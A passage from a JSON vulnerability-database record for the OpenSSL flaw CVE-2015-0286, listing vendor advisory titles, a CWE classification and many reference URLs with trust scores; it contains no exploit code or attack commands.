HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Tenable Security Advisories: [R6] OpenSSL \u002720150319\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-04" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (March 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150320-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Symantec Security Advisories: SA92 : OpenSSL Security Advisory 19-Mar-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=07adc2b6f5910b64efc7296f227b9f10" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-0286 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0286" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-17", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "NVD", "id": "CVE-2015-0286" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "trust": 1.4, "url": "https://access.redhat.com/articles/1384453" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0752.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0715.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/73225" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1202366" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152844.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152733.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-march/152734.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3197" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-03/msg00062.html" }, { "trust": 1.1, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15%3a06.openssl.asc" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00022.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2537-1" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031929" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0716.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:063" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142841429220765\u0026w=2" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-may/156823.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-may/157177.html" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "trust": 1.1, "url": "http://support.apple.com/kb/ht204942" }, { "trust": 1.1, "url": "https://support.apple.com/ht205212" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00001.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht205267" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00008.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa92" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143213830203296\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://www.fortiguard.com/advisory/2015-03-24-openssl-vulnerabilities-march-2015" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10680" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10110" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032917" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95877131/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97220341/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu99970459/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0286" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4885/security-advisory-alienvault-v5-0-" }, { "trust": 0.3, "url": "https://support.asperasoft.com/entries/93038317-security-bulletin-vulnerabilities-in-openssl" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/apr/37" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/137" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/134" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/136" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005226" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005241" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005254" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958089" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21961293" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966177" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098144" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020693" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory13.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963024" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-04-16.pdf" }, { "trust": 0.3, "url": "https://networks.unify.com/security/advisories/obso-1512-01.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005341" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964676" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701028" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005375" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21701256" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10680\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882710" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022183" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964164" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903799" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022382" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701238" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099273" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902449" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882644" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701054" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957922" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902544" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21701086" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21702160" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903269" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022367" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883028" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098141" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902519" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020716" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022103" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902673" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883593" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099272" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700167" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903425" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21722409" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960212" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960210" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701354" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21883249" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961179" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098564" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098563" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098568" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964410" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964686" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?rs=630\u0026uid=swg21970748" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960588" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960668" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903261" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903729" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701326" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883221" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883222" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21713653" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882955" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.3, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0291" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1787" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0290" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.2, "url": "https://support.apple.com/en-" }, { "trust": 0.2, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.2, "url": "http://gpgtools.org" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0288" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0292" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0293" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0287" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0289" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/17.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2537-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=39581" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c54de3da8602433283d55e7369" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-676ddad17a06423589ee8889d0" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-72d53359c85340f899e81986a7" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "http://www.hp.com/jp/icewall_patchaccess" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayinstallinfo.do?product" }, { "trust": 0.1, "url": "https://www.openssl.org/about/releasestrat.html)," }, { "trust": 0.1, "url": "https://www.openssl.org/about/secpolicy.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150108.txt" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5800" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5765" }, { "trust": 0.1, "url": "https://www.apple.com/itunes/" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5802" }, { "trust": 0.1, "url": "https://www.knownsec.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5795" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5788" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5799" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8146" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5794" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1129" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5791" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3951" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5522" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5789" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1205" }, { "trust": 0.1, "url": "https://www.safeye.org)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5793" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5764" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8611" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5523" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5801" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5796" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5790" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3801" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5792" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5767" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5748" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": 